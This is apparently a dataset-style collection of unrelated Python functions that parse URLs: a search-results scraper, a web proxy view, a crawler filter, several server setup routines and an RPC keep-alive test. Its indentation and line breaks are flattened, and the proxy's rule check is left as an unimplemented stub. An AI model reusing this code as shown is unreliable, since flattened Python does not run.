def parse_links(self, html, keyword): links_title = [] total_count = [] registration_date_latest = [] social_count = 0 q_a_count = 0 forum_count = 0 affiliate_count = 0 other_count = 0 root_count = 0 page_count = 0 below_1 = 0 below_2 = 0 more_than = 0 registration_date = [] soup = BeautifulSoup(html, "html.parser") try: snippet = soup.select_one(".ifM9O").find('h2', class_="bNg8Rb") if snippet: snipper_string = "Yes" else: snipper_string = "No" except Exception: snipper_string = "No" for title in soup.find_all("p", class_='nVcaUb'): try: search_suggestion = title.get_text() if search_suggestion.startswith("best") or search_suggestion.endswith("review") or \ search_suggestion.endswith("reviews"): columns = ["Search Keywords", "Search Suggestion Result"] suggestion_result = [keyword, search_suggestion] # Create a zip object from two lists searchObj = zip(columns, suggestion_result) # Create a dictionary from zip object seachofWords = dict(searchObj) # print(registration_date) x = mycol_3.insert_one(seachofWords) except Exception: pass for item in soup.find_all("div", class_='r'): rows = item.find('a') try: title = rows.find('h3').get_text() except Exception: title = "" try: url = rows.get('href') except Exception: url = "" links_title.append([title, url]) for i in range(len(links_title)): ext = tldextract.extract(links_title[i][1]) url = ext.domain + "." + ext.suffix try: w = whois.whois(url) try: start_date = w.creation_date[0] registration_date.extend([url, datetime.datetime.strptime(str(start_date), '%Y-%m-%d %H:%M:%S').date().strftime("%m/%d/%Y")]) registration_date_latest.append(datetime.datetime.strptime(str(start_date), '%Y-%m-%d %H:%M:%S'). date()) except: start_date = w.creation_date registration_date.extend([url, datetime.datetime.strptime(str(start_date), '%Y-%m-%d %H:%M:%S').date().strftime("%m/%d/%Y")]) registration_date_latest.append(datetime.datetime.strptime(str(start_date), '%Y-%m-%d %H:%M:%S'). date()) except: creation_date = '' registration_date.extend([url, creation_date]) try: now = datetime.datetime.now() start = datetime.datetime.strptime(str(start_date), '%Y-%m-%d %H:%M:%S').date() ends = datetime.datetime.strptime(str(now), '%Y-%m-%d %H:%M:%S.%f').date() diff = relativedelta(ends, start) if diff.years < 1: below_1 += 1 elif diff.years == 1: below_2 += 1 else: more_than += 1 except: pass root_page = urlparse(links_title[i][1]).path if root_page and root_page != '/': page_count += 1 else: root_count += 1 check_social_share = pd.Series(social_share) check_q = pd.Series(qa_site) if ext.domain in check_social_share.values: social_count += 1 elif ext.domain in check_q.values or ext.subdomain in check_q: q_a_count += 1 else: aff_match = [True for match in affiliate if match in links_title[i][0].lower()] f_match = [True for match in forum if match in links_title[i][1]] if True in f_match or any(regex.match(links_title[i][1]) for regex in regexes_forum): forum_count += 1 subdomain_remove_www = ext.subdomain.replace("www", "") if subdomain_remove_www: subdomain_remove_www = subdomain_remove_www.replace(".", "") subdomain = subdomain_remove_www + "." else: subdomain = "" forum_url = subdomain + ext.domain + "." + ext.suffix forum_links.append(forum_url) elif True in aff_match: affiliate_count += 1 else: other_count += 1 if i == len(links_title) - 1: max_r = 11 - len(links_title) for mr in range(0, max_r): value_empty = "" url = "" registration_date.extend([url, value_empty]) total_count = [keyword, social_count, q_a_count, forum_count, affiliate_count, other_count, snipper_string, root_count, page_count, below_1, below_2, more_than] total_count.extend(registration_date) if registration_date_latest: latest_date = max(registration_date_latest).strftime("%m/%d/%Y") # oldest_date = min(registration_date_latest).strftime("%m/%d/%Y") else: latest_date = "" # oldest_date = "" total_count.extend([latest_date]) # self.analysis_data.append(total_count) final_url_links = list(dict.fromkeys(forum_links)) for url_link in final_url_links: myquery_link = {"Forum Url": url_link} mydoc_link = mycol_2.find_one(myquery_link) if mydoc_link is None: # print(url_link) columns_fourms = ["Forum Url"] forum_final_url_links = [url_link] # Create a zip object from two lists forumbObj = zip(columns_fourms, forum_final_url_links) # Create a dictionary from zip object forumOfWords = dict(forumbObj) # print(registration_date) x = mycol_2.insert_one(forumOfWords) columns = ["Search Keywords", "Social Sharing Site", "Q/A Site", "Forum", "Affiliate Site", "Other", "Snippet", "Root", "Page", "Below 1", "Below 2", "More than", "Site1 Root", "Site1", "Site2 Root", "Site2", "Site3 Root", "Site3", "Site4 Root", "Site4", "Site5 Root", "Site5", "Site6 Root", "Site6", "Site7 Root", "Site7", "Site8 Root", "Site8", "Site9 Root", "Site9", "Site10 Root", "Site10", "Site11 Root", "Site11", "Latest Registration Date"] # Create a zip object from two lists zipbObj = zip(columns, total_count) # Create a dictionary from zip object dictOfWords = dict(zipbObj) #print(registration_date) x = mycol.insert_one(dictOfWords)
def proxy(request, url=None, response_callback=None, sec_chk_hosts=True, sec_chk_rules=True, timeout=None, allowed_hosts=[], **kwargs): # Request default timeout if not timeout: timeout = TIMEOUT # Security rules and settings PROXY_ALLOWED_HOSTS = getattr(settings, 'PROXY_ALLOWED_HOSTS', ()) # Sanity url checks if 'url' not in request.GET and not url: return HttpResponse("The proxy service requires a URL-encoded URL as a parameter.", status=400, content_type="text/plain" ) raw_url = url or request.GET['url'] raw_url = urljoin( settings.SITEURL, raw_url) if raw_url.startswith("/") else raw_url url = urlsplit(raw_url) scheme = str(url.scheme) locator = str(url.path) if url.query != "": locator += f"?{url.query}" if url.fragment != "": locator += f"#{url.fragment}" # White-Black Listing Hosts site_url = urlsplit(settings.SITEURL) if sec_chk_hosts and not settings.DEBUG: # Attach current SITEURL if site_url.hostname not in PROXY_ALLOWED_HOSTS: PROXY_ALLOWED_HOSTS += (site_url.hostname, ) # Attach current hostname if check_ogc_backend(geoserver.BACKEND_PACKAGE): from geonode.geoserver.helpers import ogc_server_settings hostname = ( ogc_server_settings.hostname, ) if ogc_server_settings else () if hostname not in PROXY_ALLOWED_HOSTS: PROXY_ALLOWED_HOSTS += hostname # Check OWS regexp if url.query and ows_regexp.match(url.query): ows_tokens = ows_regexp.match(url.query).groups() if len(ows_tokens) == 4 and 'version' == ows_tokens[0] and StrictVersion( ows_tokens[1]) >= StrictVersion("1.0.0") and StrictVersion( ows_tokens[1]) <= StrictVersion("3.0.0") and ows_tokens[2].lower() in ( 'getcapabilities') and ows_tokens[3].upper() in ('OWS', 'WCS', 'WFS', 'WMS', 'WPS', 'CSW'): if url.hostname not in PROXY_ALLOWED_HOSTS: PROXY_ALLOWED_HOSTS += (url.hostname, ) # Check Remote Services base_urls from geonode.services.models import Service for _s in Service.objects.all(): _remote_host = urlsplit(_s.base_url).hostname PROXY_ALLOWED_HOSTS += (_remote_host, ) if not validate_host( url.hostname, PROXY_ALLOWED_HOSTS): return HttpResponse("DEBUG is set to False but the host of the path provided to the proxy service" " is not in the PROXY_ALLOWED_HOSTS setting.", status=403, content_type="text/plain" ) # Security checks based on rules; allow only specific requests if sec_chk_rules: # TODO: Not yet implemented pass # Collecting headers and cookies headers, access_token = get_headers(request, url, raw_url, allowed_hosts=allowed_hosts) # Inject access_token if necessary parsed = urlparse(raw_url) parsed._replace(path=locator.encode('utf8')) if parsed.netloc == site_url.netloc and scheme != site_url.scheme: parsed = parsed._replace(scheme=site_url.scheme) _url = parsed.geturl() # Some clients / JS libraries generate URLs with relative URL paths, e.g. # "http://host/path/path/../file.css", which the requests library cannot # currently handle (https://github.com/kennethreitz/requests/issues/2982). # We parse and normalise such URLs into absolute paths before attempting # to proxy the request. _url = URL.from_text(_url).normalize().to_text() if request.method == "GET" and access_token and 'access_token' not in _url: query_separator = '&' if '?' in _url else '?' _url = f'{_url}{query_separator}access_token={access_token}' _data = request.body.decode('utf-8') # Avoid translating local geoserver calls into external ones if check_ogc_backend(geoserver.BACKEND_PACKAGE): from geonode.geoserver.helpers import ogc_server_settings _url = _url.replace( f'{settings.SITEURL}geoserver', ogc_server_settings.LOCATION.rstrip('/')) _data = _data.replace( f'{settings.SITEURL}geoserver', ogc_server_settings.LOCATION.rstrip('/')) response, content = http_client.request( _url, method=request.method, data=_data.encode('utf-8'), headers=headers, timeout=timeout, user=request.user) if response is None: return HttpResponse( content=content, reason=content, status=500) content = response.content or response.reason status = response.status_code content_type = response.headers.get('Content-Type') if status >= 400: return HttpResponse( content=content, reason=content, status=status, content_type=content_type) # decompress GZipped responses if not enabled # if content and response and response.getheader('Content-Encoding') == 'gzip': if content and content_type and content_type == 'gzip': buf = io.BytesIO(content) with gzip.GzipFile(fileobj=buf) as f: content = f.read() buf.close() PLAIN_CONTENT_TYPES = [ 'text', 'plain', 'html', 'json', 'xml', 'gml' ] for _ct in PLAIN_CONTENT_TYPES: if content_type and _ct in content_type and not isinstance(content, str): try: content = content.decode() break except Exception: pass if response and response_callback: kwargs = {} if not kwargs else kwargs kwargs.update({ 'response': response, 'content': content, 'status': status, 'content_type': content_type }) return response_callback(**kwargs) else: # If we get a redirect, let's add a useful message. if status and status in (301, 302, 303, 307): _response = HttpResponse((f"This proxy does not support redirects. The server in '{url}' " f"asked for a redirect to '{response.getheader('Location')}'"), status=status, content_type=content_type ) _response['Location'] = response.getheader('Location') return _response else: def _get_message(text): _s = text if isinstance(text, bytes): _s = text.decode("utf-8", "replace") try: found = re.search('<b>Message</b>(.+?)</p>', _s).group(1).strip() except Exception: found = _s return found return HttpResponse( content=content, reason=_get_message(content) if status not in (200, 201) else None, status=status, content_type=content_type)
def is_valid(self, url): """ Function returns True or False based on whether the url has to be fetched or not. This is a great place to filter out crawler traps. Duplicated urls will be taken care of by frontier. You don't need to check for duplication in this method """ word_count = 0 parsed = urlparse(url) ##开始Invalid检测 if parsed.scheme not in {"http", "https"}: return False if "calendar." in url or "/calendar" in url: traps.append(url + '\n\t\tTraps: Calendar included- may create infinite webpages') return False if len(url.split("/")) > 10 and '..' not in url: traps.append(url + "\n\t\tTraps: Recursive paths detected") return False elif (len(url.split('/')) - len(set(url.split('/'))) > 1) and 'http' not in set(url.split('/')) and '..' not in url: traps.append(url + "\n\t\tTraps: Repeat Directories detected") return False elif len(parsed.query.split("&")) > 2 and '..' not in url: traps.append(url + "\n\t\tTraps: Too many queries-may be dynamic page\n") return False ################# #判断完成,证明这个valid之后的操作: if '.' in parsed.netloc: subdomain = parsed.netloc.split(':')[0] if 'www' in subdomain.split('.'): subdomain = '.'.join(subdomain.split('.')[1:]) self.subcnt[subdomain] += 1 downloaded_all_urls.add(url) # put all the words in this page into a counter # text_string = self.url_data["content"].lower() # match_pattern = re.findall(r'\b[a-z]{3,15}\b', str(text_string)) # word_count = len(match_pattern) # for i in match_pattern: # self.cnt[i] += 1 # # # check if this page has most words # if word_count > longest_page[1]: # longest_page[0] = url # longest_page[1] = word_count ################# try: return ".ics.uci.edu" in parsed.hostname \ and not re.match(".*\.(css|js|bmp|gif|jpe?g|ico" + "|png|tiff?|mid|mp2|mp3|mp4" \ + "|wav|avi|mov|mpeg|ram|m4v|mkv|ogg|ogv|pdf" \ + "|ps|eps|tex|ppt|pptx|doc|docx|xls|xlsx|names|data|dat|exe|bz2|tar|msi|bin|7z|psd|dmg|iso|epub|dll|cnf|tgz|sha1" \ + "|thmx|mso|arff|rtf|jar|csv" \ + "|rm|smil|wmv|swf|wma|zip|rar|gz|pdf)$", parsed.path.lower()) except TypeError: print("TypeError for ", parsed) return False
def create_app(db_file=None): """create app.""" app = FlaskAPI(__name__) per_page = int( os.getenv('BUKUSERVER_PER_PAGE', str(views.DEFAULT_PER_PAGE))) per_page = per_page if per_page > 0 else views.DEFAULT_PER_PAGE app.config['BUKUSERVER_PER_PAGE'] = per_page url_render_mode = os.getenv('BUKUSERVER_URL_RENDER_MODE', views.DEFAULT_URL_RENDER_MODE) if url_render_mode not in ('full', 'netloc'): url_render_mode = views.DEFAULT_URL_RENDER_MODE app.config['BUKUSERVER_URL_RENDER_MODE'] = url_render_mode app.config['SECRET_KEY'] = os.getenv( 'BUKUSERVER_SECRET_KEY') or os.urandom(24) app.config['BUKUSERVER_DISABLE_FAVICON'] = \ get_bool_from_env_var('BUKUSERVER_DISABLE_FAVICON', True) app.config['BUKUSERVER_OPEN_IN_NEW_TAB'] = \ get_bool_from_env_var('BUKUSERVER_OPEN_IN_NEW_TAB', False) app.config['BUKUSERVER_DB_FILE'] = os.getenv( 'BUKUSERVER_DB_FILE') or db_file reverse_proxy_path = os.getenv('BUKUSERVER_REVERSE_PROXY_PATH') if reverse_proxy_path: if not reverse_proxy_path.startswith('/'): print('Warning: reverse proxy path should include preceding slash') if reverse_proxy_path.endswith('/'): print( 'Warning: reverse proxy path should not include trailing slash' ) app.config['REVERSE_PROXY_PATH'] = reverse_proxy_path if ReverseProxyPrefixFix: ReverseProxyPrefixFix(app) else: raise ImportError('Failed to import ReverseProxyPrefixFix') bukudb = BukuDb(dbfile=app.config['BUKUSERVER_DB_FILE']) app.app_context().push() setattr(flask.g, 'bukudb', bukudb) @app.shell_context_processor def shell_context(): """Shell context definition.""" return {'app': app, 'bukudb': bukudb} app.jinja_env.filters['netloc'] = lambda x: urlparse(x).netloc # pylint: disable=no-member Bootstrap(app) admin = Admin(app, name='buku server', template_mode='bootstrap3', index_view=views.CustomAdminIndexView( template='bukuserver/home.html', url='/')) # routing # api tag_api_view = ApiTagView.as_view('tag_api') app.add_url_rule('/api/tags', defaults={'tag': None}, view_func=tag_api_view, methods=['GET']) app.add_url_rule('/api/tags/<tag>', view_func=tag_api_view, methods=['GET', 'PUT']) bookmark_api_view = ApiBookmarkView.as_view('bookmark_api') app.add_url_rule('/api/bookmarks', defaults={'rec_id': None}, view_func=bookmark_api_view, methods=['GET', 'POST', 'DELETE']) app.add_url_rule('/api/bookmarks/<int:rec_id>', view_func=bookmark_api_view, methods=['GET', 'PUT', 'DELETE']) app.add_url_rule('/api/bookmarks/refresh', 'refresh_bookmark', refresh_bookmark, defaults={'rec_id': None}, methods=['POST']) app.add_url_rule('/api/bookmarks/<int:rec_id>/refresh', 'refresh_bookmark', refresh_bookmark, methods=['POST']) app.add_url_rule('/api/bookmarks/<int:rec_id>/tiny', 'get_tiny_url', get_tiny_url, methods=['GET']) app.add_url_rule('/api/network_handle', 'network_handle', handle_network, methods=['POST']) bookmark_range_api_view = ApiBookmarkRangeView.as_view( 'bookmark_range_api') app.add_url_rule('/api/bookmarks/<int:starting_id>/<int:ending_id>', view_func=bookmark_range_api_view, methods=['GET', 'PUT', 'DELETE']) bookmark_search_api_view = ApiBookmarkSearchView.as_view( 'bookmark_search_api') app.add_url_rule('/api/bookmarks/search', view_func=bookmark_search_api_view, methods=['GET', 'DELETE']) bookmarklet_view = BookmarkletView.as_view('bookmarklet') app.add_url_rule('/bookmarklet', view_func=bookmarklet_view, methods=['GET']) # non api admin.add_view( views.BookmarkModelView(bukudb, 'Bookmarks', page_size=per_page, url_render_mode=url_render_mode)) admin.add_view(views.TagModelView(bukudb, 'Tags', page_size=per_page)) admin.add_view( views.StatisticView(bukudb, 'Statistic', endpoint='statistic')) return app
def is_safe_url(target): ref_url = urlparse(request.host_url) test_url = urlparse(urljoin(request.host_url, target)) return test_url.scheme in ('http', 'https') and ref_url.netloc == test_url.netloc
def initialize(self, *args, **kwargs): """Load configuration settings.""" super().initialize(*args, **kwargs) self.load_config_file(self.config_file) # hook up tornado logging if self.debug: self.log_level = logging.DEBUG tornado.options.options.logging = logging.getLevelName(self.log_level) tornado.log.enable_pretty_logging() self.log = tornado.log.app_log self.init_pycurl() # initialize kubernetes config if self.builder_required: try: kubernetes.config.load_incluster_config() except kubernetes.config.ConfigException: kubernetes.config.load_kube_config() self.tornado_settings[ "kubernetes_client"] = self.kube_client = kubernetes.client.CoreV1Api( ) # times 2 for log + build threads self.build_pool = ThreadPoolExecutor(self.concurrent_build_limit * 2) # default executor for asyncifying blocking calls (e.g. to kubernetes, docker). # this should not be used for long-running requests self.executor = ThreadPoolExecutor(self.executor_threads) jinja_options = dict(autoescape=True, ) template_paths = [self.template_path] base_template_path = self._template_path_default() if base_template_path not in template_paths: # add base templates to the end, so they are looked up at last after custom templates template_paths.append(base_template_path) loader = ChoiceLoader([ # first load base templates with prefix PrefixLoader({'templates': FileSystemLoader([base_template_path])}, '/'), # load all templates FileSystemLoader(template_paths) ]) jinja_env = Environment(loader=loader, **jinja_options) if self.use_registry and self.builder_required: registry = DockerRegistry(parent=self) else: registry = None self.launcher = Launcher( parent=self, hub_url=self.hub_url, hub_url_local=self.hub_url_local, hub_api_token=self.hub_api_token, create_user=not self.auth_enabled, ) self.event_log = EventLog(parent=self) for schema_file in glob(os.path.join(HERE, 'event-schemas', '*.json')): with open(schema_file) as f: self.event_log.register_schema(json.load(f)) self.tornado_settings.update({ "log_function": log_request, "push_secret": self.push_secret, "image_prefix": self.image_prefix, "debug": self.debug, "launcher": self.launcher, "appendix": self.appendix, "ban_networks": self.ban_networks, "ban_networks_min_prefix_len": self.ban_networks_min_prefix_len, "build_namespace": self.build_namespace, "build_image": self.build_image, "build_node_selector": self.build_node_selector, "build_pool": self.build_pool, "sticky_builds": self.sticky_builds, "log_tail_lines": self.log_tail_lines, "pod_quota": self.pod_quota, "per_repo_quota": self.per_repo_quota, "per_repo_quota_higher": self.per_repo_quota_higher, "repo_providers": self.repo_providers, "use_registry": self.use_registry, "registry": registry, "traitlets_config": self.config, "google_analytics_code": self.google_analytics_code, "google_analytics_domain": self.google_analytics_domain, "about_message": self.about_message, "banner_message": self.banner_message, "extra_footer_scripts": self.extra_footer_scripts, "jinja2_env": jinja_env, "build_memory_limit": self.build_memory_limit, "build_memory_request": self.build_memory_request, "build_docker_host": self.build_docker_host, "build_docker_config": self.build_docker_config, "base_url": self.base_url, "badge_base_url": self.badge_base_url, "static_path": os.path.join(HERE, "static"), "static_url_prefix": url_path_join(self.base_url, "static/"), "template_variables": self.template_variables, "executor": self.executor, "auth_enabled": self.auth_enabled, "event_log": self.event_log, "normalized_origin": self.normalized_origin, }) if self.auth_enabled: self.tornado_settings['cookie_secret'] = os.urandom(32) handlers = [ (r'/metrics', MetricsHandler), (r'/versions', VersionHandler), (r"/build/([^/]+)/(.+)", BuildHandler), (r"/v2/([^/]+)/(.+)", ParameterizedMainHandler), (r"/repo/([^/]+)/([^/]+)(/.*)?", LegacyRedirectHandler), # for backward-compatible mybinder.org badge URLs # /assets/images/badge.svg (r'/assets/(images/badge\.svg)', tornado.web.StaticFileHandler, { 'path': self.tornado_settings['static_path'] }), # /badge.svg (r'/(badge\.svg)', tornado.web.StaticFileHandler, { 'path': os.path.join(self.tornado_settings['static_path'], 'images') }), # /badge_logo.svg (r'/(badge\_logo\.svg)', tornado.web.StaticFileHandler, { 'path': os.path.join(self.tornado_settings['static_path'], 'images') }), # /logo_social.png (r'/(logo\_social\.png)', tornado.web.StaticFileHandler, { 'path': os.path.join(self.tornado_settings['static_path'], 'images') }), # /favicon_XXX.ico (r'/(favicon\_fail\.ico)', tornado.web.StaticFileHandler, { 'path': os.path.join(self.tornado_settings['static_path'], 'images') }), (r'/(favicon\_success\.ico)', tornado.web.StaticFileHandler, { 'path': os.path.join(self.tornado_settings['static_path'], 'images') }), (r'/(favicon\_building\.ico)', tornado.web.StaticFileHandler, { 'path': os.path.join(self.tornado_settings['static_path'], 'images') }), (r'/about', AboutHandler), (r'/health', HealthHandler, { 'hub_url': self.hub_url_local }), (r'/_config', ConfigHandler), (r'/', MainHandler), (r'.*', Custom404), ] handlers = self.add_url_prefix(self.base_url, handlers) if self.extra_static_path: handlers.insert(-1, (re.escape( url_path_join(self.base_url, self.extra_static_url_prefix)) + r"(.*)", tornado.web.StaticFileHandler, { 'path': self.extra_static_path })) if self.auth_enabled: oauth_redirect_uri = os.getenv('JUPYTERHUB_OAUTH_CALLBACK_URL') or \ url_path_join(self.base_url, 'oauth_callback') oauth_redirect_uri = urlparse(oauth_redirect_uri).path handlers.insert( -1, (re.escape(oauth_redirect_uri), HubOAuthCallbackHandler)) self.tornado_app = tornado.web.Application(handlers, **self.tornado_settings)
def run_app( address, keystore_path, gas_price, eth_rpc_endpoint, tokennetwork_registry_contract_address, secret_registry_contract_address, endpoint_registry_contract_address, listen_address, mapped_socket, max_unresponsive_time, api_address, rpc, sync_check, console, password_file, web_ui, datadir, transport, matrix_server, network_id, environment_type, unrecoverable_error_should_crash, pathfinding_service_address, pathfinding_max_paths, config=None, extra_config=None, **kwargs, ): # pylint: disable=too-many-locals,too-many-branches,too-many-statements,unused-argument from raiden.app import App _assert_sql_version() if transport == 'udp' and not mapped_socket: raise RuntimeError('Missing socket') if datadir is None: datadir = os.path.join(os.path.expanduser('~'), '.raiden') address_hex = to_normalized_address(address) if address else None address_hex, privatekey_bin = prompt_account(address_hex, keystore_path, password_file) address = to_canonical_address(address_hex) (listen_host, listen_port) = split_endpoint(listen_address) (api_host, api_port) = split_endpoint(api_address) config['transport']['udp']['host'] = listen_host config['transport']['udp']['port'] = listen_port config['console'] = console config['rpc'] = rpc config['web_ui'] = rpc and web_ui config['api_host'] = api_host config['api_port'] = api_port if mapped_socket: config['socket'] = mapped_socket.socket config['transport']['udp']['external_ip'] = mapped_socket.external_ip config['transport']['udp'][ 'external_port'] = mapped_socket.external_port config['transport_type'] = transport config['transport']['matrix']['server'] = matrix_server config['transport']['udp'][ 'nat_keepalive_retries'] = DEFAULT_NAT_KEEPALIVE_RETRIES timeout = max_unresponsive_time / DEFAULT_NAT_KEEPALIVE_RETRIES config['transport']['udp']['nat_keepalive_timeout'] = timeout config[ 'unrecoverable_error_should_crash'] = unrecoverable_error_should_crash config['services'][ 'pathfinding_service_address'] = pathfinding_service_address config['services']['pathfinding_max_paths'] = pathfinding_max_paths parsed_eth_rpc_endpoint = urlparse(eth_rpc_endpoint) if not parsed_eth_rpc_endpoint.scheme: eth_rpc_endpoint = f'http://{eth_rpc_endpoint}' web3 = _setup_web3(eth_rpc_endpoint) rpc_client = JSONRPCClient( web3, privatekey_bin, gas_price_strategy=gas_price, block_num_confirmations=DEFAULT_NUMBER_OF_BLOCK_CONFIRMATIONS, uses_infura='infura.io' in eth_rpc_endpoint, ) blockchain_service = BlockChainService( jsonrpc_client=rpc_client, # Not giving the contract manager here, but injecting it later # since we first need blockchain service to calculate the network id ) given_network_id = network_id node_network_id = blockchain_service.network_id known_given_network_id = given_network_id in ID_TO_NETWORKNAME known_node_network_id = node_network_id in ID_TO_NETWORKNAME if node_network_id != given_network_id: if known_given_network_id and known_node_network_id: click.secho( f"The chosen ethereum network '{ID_TO_NETWORKNAME[given_network_id]}' " f"differs from the ethereum client '{ID_TO_NETWORKNAME[node_network_id]}'. " "Please update your settings.", fg='red', ) else: click.secho( f"The chosen ethereum network id '{given_network_id}' differs " f"from the ethereum client '{node_network_id}'. " "Please update your settings.", fg='red', ) sys.exit(1) config['chain_id'] = given_network_id # interpret the provided string argument if environment_type == Environment.PRODUCTION: # Safe configuration: restrictions for mainnet apply and matrix rooms have to be private config['environment_type'] = Environment.PRODUCTION config['transport']['matrix']['private_rooms'] = True else: config['environment_type'] = Environment.DEVELOPMENT environment_type = config['environment_type'] print(f'Raiden is running in {environment_type.value.lower()} mode') chain_config = {} contract_addresses_known = False contracts = dict() contracts_version = 'pre_limits' if environment_type == Environment.DEVELOPMENT else None config['contracts_path'] = contracts_precompiled_path(contracts_version) if node_network_id in ID_TO_NETWORKNAME and ID_TO_NETWORKNAME[ node_network_id] != 'smoketest': deployment_data = get_contracts_deployed(node_network_id, contracts_version) not_allowed = ( # for now we only disallow mainnet with test configuration network_id == 1 and environment_type == Environment.DEVELOPMENT) if not_allowed: click.secho( f'The chosen network ({ID_TO_NETWORKNAME[node_network_id]}) is not a testnet, ' 'but the "development" environment was selected.\n' 'This is not allowed. Please start again with a safe environment setting ' '(--environment production).', fg='red', ) sys.exit(1) contracts = deployment_data['contracts'] contract_addresses_known = True blockchain_service.inject_contract_manager( ContractManager(config['contracts_path'])) if sync_check: check_synced(blockchain_service, known_node_network_id) contract_addresses_given = ( tokennetwork_registry_contract_address is not None and secret_registry_contract_address is not None and endpoint_registry_contract_address is not None) if not contract_addresses_given and not contract_addresses_known: click.secho( f"There are no known contract addresses for network id '{given_network_id}'. " "Please provide them on the command line or in the configuration file.", fg='red', ) sys.exit(1) try: token_network_registry = blockchain_service.token_network_registry( tokennetwork_registry_contract_address or to_canonical_address( contracts[CONTRACT_TOKEN_NETWORK_REGISTRY]['address'], ), ) except ContractVersionMismatch as e: handle_contract_version_mismatch(e) except AddressWithoutCode: handle_contract_no_code('token network registry', tokennetwork_registry_contract_address) except AddressWrongContract: handle_contract_wrong_address( 'token network registry', tokennetwork_registry_contract_address, ) try: secret_registry = blockchain_service.secret_registry( secret_registry_contract_address or to_canonical_address( contracts[CONTRACT_SECRET_REGISTRY]['address'], ), ) except ContractVersionMismatch as e: handle_contract_version_mismatch(e) except AddressWithoutCode: handle_contract_no_code('secret registry', secret_registry_contract_address) except AddressWrongContract: handle_contract_wrong_address('secret registry', secret_registry_contract_address) database_path = os.path.join( datadir, f'node_{pex(address)}', f'netid_{given_network_id}', f'network_{pex(token_network_registry.address)}', f'v{RAIDEN_DB_VERSION}_log.db', ) config['database_path'] = database_path print( '\nYou are connected to the \'{}\' network and the DB path is: {}'. format( ID_TO_NETWORKNAME.get(given_network_id, given_network_id), database_path, ), ) discovery = None if transport == 'udp': transport, discovery = _setup_udp( config, blockchain_service, address, contracts, endpoint_registry_contract_address, ) elif transport == 'matrix': transport = _setup_matrix(config) else: raise RuntimeError(f'Unknown transport type "{transport}" given') raiden_event_handler = RaidenEventHandler() message_handler = MessageHandler() try: if 'contracts' in chain_config: start_block = chain_config['contracts']['TokenNetworkRegistry'][ 'block_number'] else: start_block = 0 raiden_app = App( config=config, chain=blockchain_service, query_start_block=start_block, default_registry=token_network_registry, default_secret_registry=secret_registry, transport=transport, raiden_event_handler=raiden_event_handler, message_handler=message_handler, discovery=discovery, ) except RaidenError as e: click.secho(f'FATAL: {e}', fg='red') sys.exit(1) try: raiden_app.start() except RuntimeError as e: click.secho(f'FATAL: {e}', fg='red') sys.exit(1) except filelock.Timeout: name_or_id = ID_TO_NETWORKNAME.get(given_network_id, given_network_id) click.secho( f'FATAL: Another Raiden instance already running for account {address_hex} on ' f'network id {name_or_id}', fg='red', ) sys.exit(1) return raiden_app
def is_absolute(url): return bool(urlparse(url).netloc) #https://stackoverflow.com/questions/8357098/how-can-i-check-if-a-url-is-absolute-using-python
def filename(self): return urlparse(self.__url).path.rsplit('/', 1)[-1]
def run_test(self): ################################################# # lowlevel check for http persistent connection # ################################################# url = urlparse.urlparse(self.nodes[0].url) authpair = url.username + ':' + url.password headers = {"Authorization": "Basic " + base64.b64encode(authpair)} conn = httplib.HTTPConnection(url.hostname, url.port) conn.connect() conn.request('POST', '/', '{"method": "getbestblockhash"}', headers) out1 = conn.getresponse().read() assert_equal('"error":null' in out1, True) assert_equal( conn.sock != None, True) #according to http/1.1 connection must still be open! #send 2nd request without closing connection conn.request('POST', '/', '{"method": "getchaintips"}', headers) out2 = conn.getresponse().read() assert_equal('"error":null' in out1, True) #must also response with a correct json-rpc message assert_equal( conn.sock != None, True) #according to http/1.1 connection must still be open! conn.close() #same should be if we add keep-alive because this should be the std. behaviour headers = { "Authorization": "Basic " + base64.b64encode(authpair), "Connection": "keep-alive" } conn = httplib.HTTPConnection(url.hostname, url.port) conn.connect() conn.request('POST', '/', '{"method": "getbestblockhash"}', headers) out1 = conn.getresponse().read() assert_equal('"error":null' in out1, True) assert_equal( conn.sock != None, True) #according to http/1.1 connection must still be open! #send 2nd request without closing connection conn.request('POST', '/', '{"method": "getchaintips"}', headers) out2 = conn.getresponse().read() assert_equal('"error":null' in out1, True) #must also response with a correct json-rpc message assert_equal( conn.sock != None, True) #according to http/1.1 connection must still be open! conn.close() #now do the same with "Connection: close" headers = { "Authorization": "Basic " + base64.b64encode(authpair), "Connection": "close" } conn = httplib.HTTPConnection(url.hostname, url.port) conn.connect() conn.request('POST', '/', '{"method": "getbestblockhash"}', headers) out1 = conn.getresponse().read() assert_equal('"error":null' in out1, True) assert_equal( conn.sock != None, False) #now the connection must be closed after the response #node1 (2nd node) is running with disabled keep-alive option urlNode1 = urlparse.urlparse(self.nodes[1].url) authpair = urlNode1.username + ':' + urlNode1.password headers = {"Authorization": "Basic " + base64.b64encode(authpair)} conn = httplib.HTTPConnection(urlNode1.hostname, urlNode1.port) conn.connect() conn.request('POST', '/', '{"method": "getbestblockhash"}', headers) out1 = conn.getresponse().read() assert_equal('"error":null' in out1, True) #node2 (third node) is running with standard keep-alive parameters which means keep-alive is on urlNode2 = urlparse.urlparse(self.nodes[2].url) authpair = urlNode2.username + ':' + urlNode2.password headers = {"Authorization": "Basic " + base64.b64encode(authpair)} conn = httplib.HTTPConnection(urlNode2.hostname, urlNode2.port) conn.connect() conn.request('POST', '/', '{"method": "getbestblockhash"}', headers) out1 = conn.getresponse().read() assert_equal('"error":null' in out1, True) assert_equal( conn.sock != None, True ) #connection must be closed because civilbitd should use keep-alive by default # Check excessive request size conn = httplib.HTTPConnection(urlNode2.hostname, urlNode2.port) conn.connect() conn.request('GET', '/' + ('x' * 1000), '', headers) out1 = conn.getresponse() assert_equal(out1.status, httplib.NOT_FOUND) conn = httplib.HTTPConnection(urlNode2.hostname, urlNode2.port) conn.connect() conn.request('GET', '/' + ('x' * 10000), '', headers) out1 = conn.getresponse() assert_equal(out1.status, httplib.BAD_REQUEST)
